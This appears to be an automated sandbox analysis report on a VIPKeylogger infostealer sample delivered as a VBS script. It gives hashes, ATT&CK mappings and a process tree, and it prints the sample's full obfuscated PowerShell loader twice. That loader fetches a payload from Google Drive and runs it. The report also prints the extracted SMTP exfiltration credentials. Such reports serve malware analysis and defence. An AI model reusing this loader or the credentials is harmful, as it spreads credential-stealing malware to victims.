vipkeylogger | 4954ea878148cb17c83c6153b3ec49717bbc0413b9cbbf5dca627a3cd7b66128

General

Target

QuartoProyectosS.LLISTADECOMPRAS.vbs
Size

25KB
MD5

ca083dbfc2070c0b62a0ec8fa3bd640c
SHA1

779bdfe5ffeaced9821650e6d705fd62b3fd2306
SHA256

4954ea878148cb17c83c6153b3ec49717bbc0413b9cbbf5dca627a3cd7b66128
SHA512

737653fbf8731c35c754f5a8be9248806e2685c34b256bb389b8683b92587a1bf0abe94f23b8b617fa541d613b366c5c553f2fc09bc96fd92253f3ee51d1f33f
SSDEEP

384:4Md+TuIVsrW8EBL1ncevsHkMKeXQyv1Xrxi4j:4s+CIVAWRl1nR6PvJrx5j

Score

10^/10

vipkeylogger collection discovery execution keylogger stealer

Malware Config

Extracted

Family

vipkeylogger

Credentials

Protocol: smtp
Host:
mail.amenitieshotel.com
Port:
587
Username:
[email protected]
Password:
HeibaPaco
Email To:
[email protected]

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vipkeylogger family
vipkeylogger

Blocklisted process makes network request 11 IoCs

flow	pid	Process
2	100	WScript.exe
22	3332	powershell.exe
24	3332	powershell.exe
35	5116	msiexec.exe
37	5116	msiexec.exe
39	5116	msiexec.exe
41	5116	msiexec.exe
42	5116	msiexec.exe
45	5116	msiexec.exe
54	5116	msiexec.exe
63	5116	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3332	powershell.exe
1536	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
21	drive.google.com
22	drive.google.com
35	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
44	checkip.dyndns.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
5116	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1536	powershell.exe
5116	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3332	powershell.exe
3332	powershell.exe
1536	powershell.exe
1536	powershell.exe
1536	powershell.exe
5116	msiexec.exe
5116	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1536	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	5116	msiexec.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 100 wrote to memory of 3332	100	WScript.exe	87
PID 100 wrote to memory of 3332	100	WScript.exe	87
PID 1536 wrote to memory of 5116	1536	powershell.exe	102
PID 1536 wrote to memory of 5116	1536	powershell.exe	102
PID 1536 wrote to memory of 5116	1536	powershell.exe	102
PID 1536 wrote to memory of 5116	1536	powershell.exe	102

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\QuartoProyectosS.LLISTADECOMPRAS.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Waitstate Endefuld Kejserpingvin #>;$Spritballonen125='Unsettable';<#Begramser Eskapader Hellebardens Strudspolitikken Hypocreaceous Fastgr Porta #>; function Crojack($Preexamination){If ($host.DebuggerEnabled) {$Disbosoming++;}$Pleroma=$Aris+$Preexamination.'Length' - $Disbosoming; for ( $Unscarred=5;$Unscarred -lt $Pleroma;$Unscarred+=6){$Revyernes=$Unscarred;$Centred+=$Preexamination[$Unscarred];}$Centred;}function Trummerums($Forjudge){ . ($acetatcelluloses) ($Forjudge);}$Fussiness141=Crojack ' T ldM b aso FielzsteriiPhosplFashil PrejaClu r/Inst ';$Unscarredndlgning=Crojack 'BdlerTServal eldas Para1Mod.f2Congl ';$Unscarredndledningsforedraget='Po tu[ Kn cN SerpEgrenaT Kaem.MedleS Ba besubprR TorpvH gadIdiri cObducEPedanpwalesoMask i onhiN tilsT ImpeMForg aSu arnv.dfjaW relgM.strE FrihrOve c]antip:Gloss:filipSD ydeeBol.jCStar.UStri.RLepriiT,bleTLovgiYKradsPKrydsRInt lORa iotHaploO ResucdeperolaverlGenf =hj.eb$KabinUS,utknTouchSKrebiCHalsba GipsR,richRBi leeAflokdAlbatNTertodNonoxlTortug StarnI darI ,estn Aut,gDi tr ';$Fussiness141+=Crojack 'Targe5Sk.if.Geose0Ergon sprin(Logi WTragiiUdlejnGarotd O,aloScrapwSupers H mo TreroNSinguTTrans Opera1Pseud0.ipon.Unper0Boome;Duntt StrafWThymei,otarnApa.d6Veget4Udstd; U.mo DotinxSu te6 arte4Af al;Si gi BallervaranvHassi: Mist1 Enfa3Ambit1U boz.Dextr0 Bio,) ysgi Unco GVredeeLi ogcSpacik AlbuoKve.l/Qubba2Olymp0.illu1Flurn0Godte0Egens1 aml0Expon1Chemi AspirF Ide i,eninrPeckheUayebfantonoShamixol cr/Out u1 Pret3skytt1 udtr.barad0 host ';$Causativeness=Crojack 'Firedu,nterSMglineMis,erC,oss-Wa chAAnnargSdebaEVismnnazerbT.nder ';$Blokadegreb=Crojack 'ForeshUpdr tServitKuglep Ukr sSwl a:Ha,pn/Verif/GelatdRadior Sem i Synkv urre Tylo.UnrefgNeoteoSensio CigagAuctilFis.ee inan.KorrecUn.ivoHors.mbrowd/Sin luU dslcProgy?Knskve.tnkexVaskepDurbaoIndprr orhotAntic=NoneqdMunitoUr liwL.godnNatt lUn cro Sap.asuppuddiago&Jongli.xtridGar i=Skrbe1AcetolHarpuA Baadsreuti2Varelc Cathm ContdPerip3 Ic lrSk rpe arenOunmarBReplogAlkoh4S,ncy5CeripQKongehTndrrkkaplaQBarreHUdstdaFire W HairI tryc9Brier0anstah Logh4Kostu_LokalUAntit0Mush KfremsdPresu ';$Daadyret=Crojack 'Pecul>Rolli ';$acetatcelluloses=Crojack 'AmtstICoetaeH,husX Dah, ';$Bymidters='Paaklder';$Hornblseres='\skarnsstregernes.Cal';Trummerums (Crojack 'Uddyk$ ContgKloakLSad eOUn rgBSubunAUdpibLYa ni: IndkS ,emiOGerenNPegledUncomrDagdrE Procn forlDHjresE andasEthno=Coron$EstraeGastrNEnergvB,fil:.verbaRomtopOmnispU.murDS,rreaBlaffTBy svAarrig+matro$Unac,h ishnOHeterR ellynPr stb remLNematSPolysEBere,RMirysEBrunksImpro ');Trummerums (Crojack 'Udrmn$SkrivggiddyLComprO BoksB Abesa Antil Spyt:Fort,RE,queA SkriF,kyggTTttenE SemiRDesers Bifi= Afma$ ignab ,elolPlaceOTransK ElecAErhved ,orneIntroGCephaR lid,e SlynBFarm..n.sitsFar opI,nial Ch nIMesoptDet c( P,tt$ InfeD LegwAl llsaUndisDAnaloyKlarlR O sgEHollotTylot)Crep ');Trummerums (Crojack $Unscarredndledningsforedraget);$Blokadegreb=$Rafters[0];$Trange=(Crojack 'Blodt$Kr migTommaLlektoo FetiBRegnsaJ asuLRkehe:.drelSCultutLynn,eBrum RUncilsS egmsKatalEG achjcoeliLDuve aSydamD ynrSFalliEDampln HighsSens 2Outro0Eleut2Stopp=UprooNTilt ETibetWDiket- EstaoUnresB PhylJS,orpE inddcSer eTBr nd PaedoSsmsynYRighoS embat SteeE AvadmMarin. DisknAfhr,eVidesTBrn b.SolskWD.ntaeBotilbTelecCRrerbLI,expIDeorieKommenPaasmt Y ge ');Trummerums ($Trange);Trummerums (Crojack 'Self.$NydelS SkiltAnerkeShoulrTe desNonhusOppore LattjNabonlspranaSka sdParris,ansaeLonknn Assys olyl2Undla0Inter2Tilsk.UndisH N teeTpp fa otcd synceMiljmrBlanqsGanes[Ree a$Nat.rCKon oaTimi.u ugtesJose,aPersttBlowji.udolvNonareDuctan tofefyrinsDi amso,krs]demo =Skvat$ lammFan eduSkrans,umbesTips i KontnNvneveBrewhsDet,lsStet.1 ledg4M esl1Pr mo ');$Encoignure=Crojack 'Modvi$ o faS G,vetTurboe ntocr panispneumsGlamoe,omoljFerrelHaveta KistdunfissSvi,eeSensonS ejss C mp2misgu0Hjemf2vieva.CommaDInderoRealtwBron n PinglHegnsoBlgebaTermidImbecF ongiProcul LinieEverb( Pist$ S eiB IgnolUnwitoHjemmkAkkomaOu dodCytopeG nerg Dri r lankeSig fbL.stl,Notet$UnrepSAnvi,u rkesm P hapFurnat Sl,diGruppoGibe,nsukkeeHurtlnRet,m)Grane ';$Sumptionen=$Sondrendes;Trummerums (Crojack 'K,mph$DetanGFirm.LUeg noSombrbAngioa SuscLStell:DisgrgBjetke Kapen In psBesjlTPontiA BudsrH ariTNe,lgEApeirT No,r=Preat(NouritDale,eSpurisSchistStnne- Tri.PAktioASjlegTTuberh su e Aars$Kna tSZardmuide smFlairpHooplTInfr IOdobeO idelnko poeF rhanSplas)Bago ');while (!$Genstartet) {Trummerums (Crojack 'Pr fa$Kvin gUd trl,neumoIsm,ebDemulaIsocylHipp.:MordaSElef,l ertieSmrbouTegnit OrdrhItchy=Refor$KanartCotcor andruPseudeDa so ') ;Trummerums $Encoignure;Trummerums (Crojack 'IndisS TubetAmygdaSosiarU derTTrin.-GdendSDe anl SvanEAntikEVsensPInaug Over.4Pipes ');Trummerums (Crojack 'Sukk.$,ramag DatalHornfOPaleoB Ch raAlgoplChaet:mom sgPrteneHennaNUndersPrissTRepopaBoy oRTromptFreelESpradTfrste=Insti(CaligT C,apE D moSGl esTHotte-PrestpSladrA CounTDemagHBrnd Testi$.krubsNon uuClausMIndrep .tomTUnfrii LippoOpi,tNCyk leEksamNPhary)Forv. ') ;Trummerums (Crojack 'P.ler$ UndeGSekunlFamiloNonsuBFulgoAB aanLImbib:CosmoUNo,stmRatioeAndagnRappenB muzeTilbasPlimskKos.pE MollRSatir= ynk$U evoGJ nusLKa.pao ModuB NebeAW.eshlDrift: A buSSymmetAn elRValdeaU lrtIP,eumGProloHScrewtUn,veT DomeA ynamITospaLBaro.+ Hum +Total%stude$ Gyp.r raababystyF PtertUndi,e Ko.tR,ultuS Crof. bjecC.einsOEr veUB lysn EulotS.end ') ;$Blokadegreb=$Rafters[$Umennesker];}$Franchised=315455;$Cityward=31405;Trummerums (Crojack 'vapor$ TandgRytteL Bu rose viB HaruAIndpiLAfkli: ChamsCycloAAntimLS.devpMuscuINonelG U,gkLSt anO Dil,sJagg,s Co eiT wnesRainm Skurk=Whit Em lgGHekseEAs roTVa la-Tran C JespOMycotn euctA,iroe Jas nPsyc tKhmer Geo l$FluorsDipteuAgapemBrnegPWumbltSt llIS ovaoOcy,rnhj efe aranN Impr ');Trummerums (Crojack 'Bloo $ MuskgPredilCentroLuf.lbHumo,aPaksklTowa :Sk.teB Sk.leFa.stcL.tfoh skefa onormFremtePra,tlsamm,s Oesto Lg hv OversPresuePronerBast,nSi,frefictisBort Steph=Overs Calm,[FimetSPetroyCheatsRokjjtPresueGlozemIrln,.EsterCVicisoLori nRet,evMytedeSsonarFiskatRepug],alla: Bor :Mi kkFEmp lr Fyl,o aadsm.fpasB Sca aC mplsDa ide Fini6 Phil4kerauSB ldatBloe rAmendienfl,nIn urgMurbr(Un er$ ReflS taldaSlumslnirvapOversiExpreg Precl ,odaoUopmrsP,intsDeliqiSri asSpina)ubest ');Trummerums (Crojack ' Pove$Sp ingInvullMe teOConsuBK mmuAMiffiLBr ag:ChokbbStvfaI aimef ScraOGunpoljumanlSemicIIntr CcharauUnsenlMa esaUngdorNring Genta=Afske Damps[FistusWhiloYD.iftSCulleT.nrepEJumb m Gadg.TordnT NonsEObersx LiljTCapta.AsperEFlo mn Id,ic adneoPers D P raITribunOxyhaGUds a]Ap ro:Tidss:S,rafaChronS B,dic VideiSlibeIB mni.SnotagBlusnEMonostBas lS.lishtsynorR P.sei hokn phleGOmlas(j rnt$ Bunkb ornuEFilamCDiskohqu.nqaPreshm incoeS aldl ServsTendeo nimaVDrapeSProacEBuckmRForspnInterETeat S.eflo) af r ');Trummerums (Crojack 'Dress$AlabagUful L indvoRepsbbLogika HeltLlands: WoodD SandEBo.fimBlybaISner,dSceneO dichcOv.rctPreknoCocoorhaand=M,cki$MarcibXeniciGun,cF artrOPanimlGal.al oituiCivilcBeto.uFezenl GrilAginglR Terr.tel cs SoutUGen pBBesins rel,t damrRpteroiIntranFlagkg Fade(Biogr$Redu,fHaardRVideraDi lunGeratCTilfrhBlresIAssorS Ly,keAfs.rd onin,Aande$PermuCTrofaialtarTExterY laadW Tyr ArejfpRCanindToupe) Cha, ');Trummerums $Demidoctor;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3332

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Waitstate Endefuld Kejserpingvin #>;$Spritballonen125='Unsettable';<#Begramser Eskapader Hellebardens Strudspolitikken Hypocreaceous Fastgr Porta #>; function Crojack($Preexamination){If ($host.DebuggerEnabled) {$Disbosoming++;}$Pleroma=$Aris+$Preexamination.'Length' - $Disbosoming; for ( $Unscarred=5;$Unscarred -lt $Pleroma;$Unscarred+=6){$Revyernes=$Unscarred;$Centred+=$Preexamination[$Unscarred];}$Centred;}function Trummerums($Forjudge){ . ($acetatcelluloses) ($Forjudge);}$Fussiness141=Crojack ' T ldM b aso FielzsteriiPhosplFashil PrejaClu r/Inst ';$Unscarredndlgning=Crojack 'BdlerTServal eldas Para1Mod.f2Congl ';$Unscarredndledningsforedraget='Po tu[ Kn cN SerpEgrenaT Kaem.MedleS Ba besubprR TorpvH gadIdiri cObducEPedanpwalesoMask i onhiN tilsT ImpeMForg aSu arnv.dfjaW relgM.strE FrihrOve c]antip:Gloss:filipSD ydeeBol.jCStar.UStri.RLepriiT,bleTLovgiYKradsPKrydsRInt lORa iotHaploO ResucdeperolaverlGenf =hj.eb$KabinUS,utknTouchSKrebiCHalsba GipsR,richRBi leeAflokdAlbatNTertodNonoxlTortug StarnI darI ,estn Aut,gDi tr ';$Fussiness141+=Crojack 'Targe5Sk.if.Geose0Ergon sprin(Logi WTragiiUdlejnGarotd O,aloScrapwSupers H mo TreroNSinguTTrans Opera1Pseud0.ipon.Unper0Boome;Duntt StrafWThymei,otarnApa.d6Veget4Udstd; U.mo DotinxSu te6 arte4Af al;Si gi BallervaranvHassi: Mist1 Enfa3Ambit1U boz.Dextr0 Bio,) ysgi Unco GVredeeLi ogcSpacik AlbuoKve.l/Qubba2Olymp0.illu1Flurn0Godte0Egens1 aml0Expon1Chemi AspirF Ide i,eninrPeckheUayebfantonoShamixol cr/Out u1 Pret3skytt1 udtr.barad0 host ';$Causativeness=Crojack 'Firedu,nterSMglineMis,erC,oss-Wa chAAnnargSdebaEVismnnazerbT.nder ';$Blokadegreb=Crojack 'ForeshUpdr tServitKuglep Ukr sSwl a:Ha,pn/Verif/GelatdRadior Sem i Synkv urre Tylo.UnrefgNeoteoSensio CigagAuctilFis.ee inan.KorrecUn.ivoHors.mbrowd/Sin luU dslcProgy?Knskve.tnkexVaskepDurbaoIndprr orhotAntic=NoneqdMunitoUr liwL.godnNatt lUn cro Sap.asuppuddiago&Jongli.xtridGar i=Skrbe1AcetolHarpuA Baadsreuti2Varelc Cathm ContdPerip3 Ic lrSk rpe arenOunmarBReplogAlkoh4S,ncy5CeripQKongehTndrrkkaplaQBarreHUdstdaFire W HairI tryc9Brier0anstah Logh4Kostu_LokalUAntit0Mush KfremsdPresu ';$Daadyret=Crojack 'Pecul>Rolli ';$acetatcelluloses=Crojack 'AmtstICoetaeH,husX Dah, ';$Bymidters='Paaklder';$Hornblseres='\skarnsstregernes.Cal';Trummerums (Crojack 'Uddyk$ ContgKloakLSad eOUn rgBSubunAUdpibLYa ni: IndkS ,emiOGerenNPegledUncomrDagdrE Procn forlDHjresE andasEthno=Coron$EstraeGastrNEnergvB,fil:.verbaRomtopOmnispU.murDS,rreaBlaffTBy svAarrig+matro$Unac,h ishnOHeterR ellynPr stb remLNematSPolysEBere,RMirysEBrunksImpro ');Trummerums (Crojack 'Udrmn$SkrivggiddyLComprO BoksB Abesa Antil Spyt:Fort,RE,queA SkriF,kyggTTttenE SemiRDesers Bifi= Afma$ ignab ,elolPlaceOTransK ElecAErhved ,orneIntroGCephaR lid,e SlynBFarm..n.sitsFar opI,nial Ch nIMesoptDet c( P,tt$ InfeD LegwAl llsaUndisDAnaloyKlarlR O sgEHollotTylot)Crep ');Trummerums (Crojack $Unscarredndledningsforedraget);$Blokadegreb=$Rafters[0];$Trange=(Crojack 'Blodt$Kr migTommaLlektoo FetiBRegnsaJ asuLRkehe:.drelSCultutLynn,eBrum RUncilsS egmsKatalEG achjcoeliLDuve aSydamD ynrSFalliEDampln HighsSens 2Outro0Eleut2Stopp=UprooNTilt ETibetWDiket- EstaoUnresB PhylJS,orpE inddcSer eTBr nd PaedoSsmsynYRighoS embat SteeE AvadmMarin. DisknAfhr,eVidesTBrn b.SolskWD.ntaeBotilbTelecCRrerbLI,expIDeorieKommenPaasmt Y ge ');Trummerums ($Trange);Trummerums (Crojack 'Self.$NydelS SkiltAnerkeShoulrTe desNonhusOppore LattjNabonlspranaSka sdParris,ansaeLonknn Assys olyl2Undla0Inter2Tilsk.UndisH N teeTpp fa otcd synceMiljmrBlanqsGanes[Ree a$Nat.rCKon oaTimi.u ugtesJose,aPersttBlowji.udolvNonareDuctan tofefyrinsDi amso,krs]demo =Skvat$ lammFan eduSkrans,umbesTips i KontnNvneveBrewhsDet,lsStet.1 ledg4M esl1Pr mo ');$Encoignure=Crojack 'Modvi$ o faS G,vetTurboe ntocr panispneumsGlamoe,omoljFerrelHaveta KistdunfissSvi,eeSensonS ejss C mp2misgu0Hjemf2vieva.CommaDInderoRealtwBron n PinglHegnsoBlgebaTermidImbecF ongiProcul LinieEverb( Pist$ S eiB IgnolUnwitoHjemmkAkkomaOu dodCytopeG nerg Dri r lankeSig fbL.stl,Notet$UnrepSAnvi,u rkesm P hapFurnat Sl,diGruppoGibe,nsukkeeHurtlnRet,m)Grane ';$Sumptionen=$Sondrendes;Trummerums (Crojack 'K,mph$DetanGFirm.LUeg noSombrbAngioa SuscLStell:DisgrgBjetke Kapen In psBesjlTPontiA BudsrH ariTNe,lgEApeirT No,r=Preat(NouritDale,eSpurisSchistStnne- Tri.PAktioASjlegTTuberh su e Aars$Kna tSZardmuide smFlairpHooplTInfr IOdobeO idelnko poeF rhanSplas)Bago ');while (!$Genstartet) {Trummerums (Crojack 'Pr fa$Kvin gUd trl,neumoIsm,ebDemulaIsocylHipp.:MordaSElef,l ertieSmrbouTegnit OrdrhItchy=Refor$KanartCotcor andruPseudeDa so ') ;Trummerums $Encoignure;Trummerums (Crojack 'IndisS TubetAmygdaSosiarU derTTrin.-GdendSDe anl SvanEAntikEVsensPInaug Over.4Pipes ');Trummerums (Crojack 'Sukk.$,ramag DatalHornfOPaleoB Ch raAlgoplChaet:mom sgPrteneHennaNUndersPrissTRepopaBoy oRTromptFreelESpradTfrste=Insti(CaligT C,apE D moSGl esTHotte-PrestpSladrA CounTDemagHBrnd Testi$.krubsNon uuClausMIndrep .tomTUnfrii LippoOpi,tNCyk leEksamNPhary)Forv. ') ;Trummerums (Crojack 'P.ler$ UndeGSekunlFamiloNonsuBFulgoAB aanLImbib:CosmoUNo,stmRatioeAndagnRappenB muzeTilbasPlimskKos.pE MollRSatir= ynk$U evoGJ nusLKa.pao ModuB NebeAW.eshlDrift: A buSSymmetAn elRValdeaU lrtIP,eumGProloHScrewtUn,veT DomeA ynamITospaLBaro.+ Hum +Total%stude$ Gyp.r raababystyF PtertUndi,e Ko.tR,ultuS Crof. bjecC.einsOEr veUB lysn EulotS.end ') ;$Blokadegreb=$Rafters[$Umennesker];}$Franchised=315455;$Cityward=31405;Trummerums (Crojack 'vapor$ TandgRytteL Bu rose viB HaruAIndpiLAfkli: ChamsCycloAAntimLS.devpMuscuINonelG U,gkLSt anO Dil,sJagg,s Co eiT wnesRainm Skurk=Whit Em lgGHekseEAs roTVa la-Tran C JespOMycotn euctA,iroe Jas nPsyc tKhmer Geo l$FluorsDipteuAgapemBrnegPWumbltSt llIS ovaoOcy,rnhj efe aranN Impr ');Trummerums (Crojack 'Bloo $ MuskgPredilCentroLuf.lbHumo,aPaksklTowa :Sk.teB Sk.leFa.stcL.tfoh skefa onormFremtePra,tlsamm,s Oesto Lg hv OversPresuePronerBast,nSi,frefictisBort Steph=Overs Calm,[FimetSPetroyCheatsRokjjtPresueGlozemIrln,.EsterCVicisoLori nRet,evMytedeSsonarFiskatRepug],alla: Bor :Mi kkFEmp lr Fyl,o aadsm.fpasB Sca aC mplsDa ide Fini6 Phil4kerauSB ldatBloe rAmendienfl,nIn urgMurbr(Un er$ ReflS taldaSlumslnirvapOversiExpreg Precl ,odaoUopmrsP,intsDeliqiSri asSpina)ubest ');Trummerums (Crojack ' Pove$Sp ingInvullMe teOConsuBK mmuAMiffiLBr ag:ChokbbStvfaI aimef ScraOGunpoljumanlSemicIIntr CcharauUnsenlMa esaUngdorNring Genta=Afske Damps[FistusWhiloYD.iftSCulleT.nrepEJumb m Gadg.TordnT NonsEObersx LiljTCapta.AsperEFlo mn Id,ic adneoPers D P raITribunOxyhaGUds a]Ap ro:Tidss:S,rafaChronS B,dic VideiSlibeIB mni.SnotagBlusnEMonostBas lS.lishtsynorR P.sei hokn phleGOmlas(j rnt$ Bunkb ornuEFilamCDiskohqu.nqaPreshm incoeS aldl ServsTendeo nimaVDrapeSProacEBuckmRForspnInterETeat S.eflo) af r ');Trummerums (Crojack 'Dress$AlabagUful L indvoRepsbbLogika HeltLlands: WoodD SandEBo.fimBlybaISner,dSceneO dichcOv.rctPreknoCocoorhaand=M,cki$MarcibXeniciGun,cF artrOPanimlGal.al oituiCivilcBeto.uFezenl GrilAginglR Terr.tel cs SoutUGen pBBesins rel,t damrRpteroiIntranFlagkg Fade(Biogr$Redu,fHaardRVideraDi lunGeratCTilfrhBlresIAssorS Ly,keAfs.rd onin,Aande$PermuCTrofaialtarTExterY laadW Tyr ArejfpRCanindToupe) Cha, ');Trummerums $Demidoctor;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1536
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Accesses Microsoft Outlook profiles
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:5116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

Query Registry

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d336b18e0e02e045650ac4f24c7ecaa7

SHA1
87ce962bb3aa89fc06d5eb54f1a225ae76225b1c

SHA256
87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27

SHA512
e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jt3r1azq.nga.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\skarnsstregernes.Cal

Filesize
451KB

MD5
c577c916b21298b485138f22ed96513b

SHA1
be424e10fdf1b3558cfbf387a346293b841109c8

SHA256
b55b40fc6f4ad73957d7f0bb14610fb438f22225ff61f346e7978588efbf6189

SHA512
0fac2e7f8f40ad6ed394584ad0e59804ad916a83d5b40890f7027364c109a860c693c2ecd96498a98360a53f96755e48a89e2861e63bbd0a39a8e29573eea81f

Download Submit
memory/1536-46-0x0000000008D80000-0x0000000009324000-memory.dmp

Filesize
5.6MB

Download
memory/1536-41-0x00000000069D0000-0x0000000006A1C000-memory.dmp

Filesize
304KB

Download
memory/1536-48-0x0000000009330000-0x000000000AA34000-memory.dmp

Filesize
23.0MB

Download
memory/1536-45-0x0000000007B30000-0x0000000007B52000-memory.dmp

Filesize
136KB

Download
memory/1536-44-0x0000000007B90000-0x0000000007C26000-memory.dmp

Filesize
600KB

Download
memory/1536-24-0x0000000005310000-0x0000000005346000-memory.dmp

Filesize
216KB

Download
memory/1536-25-0x0000000005980000-0x0000000005FA8000-memory.dmp

Filesize
6.2MB

Download
memory/1536-26-0x00000000060A0000-0x00000000060C2000-memory.dmp

Filesize
136KB

Download
memory/1536-27-0x0000000006140000-0x00000000061A6000-memory.dmp

Filesize
408KB

Download
memory/1536-28-0x00000000061B0000-0x0000000006216000-memory.dmp

Filesize
408KB

Download
memory/1536-38-0x0000000006300000-0x0000000006654000-memory.dmp

Filesize
3.3MB

Download
memory/1536-43-0x0000000007A80000-0x0000000007A9A000-memory.dmp

Filesize
104KB

Download
memory/1536-40-0x0000000006920000-0x000000000693E000-memory.dmp

Filesize
120KB

Download
memory/1536-42-0x0000000008150000-0x00000000087CA000-memory.dmp

Filesize
6.5MB

Download
memory/3332-19-0x00007FF975343000-0x00007FF975345000-memory.dmp

Filesize
8KB

Download
memory/3332-16-0x00007FF975340000-0x00007FF975E01000-memory.dmp

Filesize
10.8MB

Download
memory/3332-23-0x00007FF975340000-0x00007FF975E01000-memory.dmp

Filesize
10.8MB

Download
memory/3332-20-0x00007FF975340000-0x00007FF975E01000-memory.dmp

Filesize
10.8MB

Download
memory/3332-4-0x00007FF975343000-0x00007FF975345000-memory.dmp

Filesize
8KB

Download
memory/3332-5-0x000001290F120000-0x000001290F142000-memory.dmp

Filesize
136KB

Download
memory/3332-15-0x00007FF975340000-0x00007FF975E01000-memory.dmp

Filesize
10.8MB

Download
memory/5116-68-0x0000000022120000-0x00000000221B2000-memory.dmp

Filesize
584KB

Download
memory/5116-62-0x0000000000A00000-0x0000000000A48000-memory.dmp

Filesize
288KB

Download
memory/5116-63-0x00000000213F0000-0x000000002148C000-memory.dmp

Filesize
624KB

Download
memory/5116-65-0x0000000021F50000-0x0000000022112000-memory.dmp

Filesize
1.8MB

Download
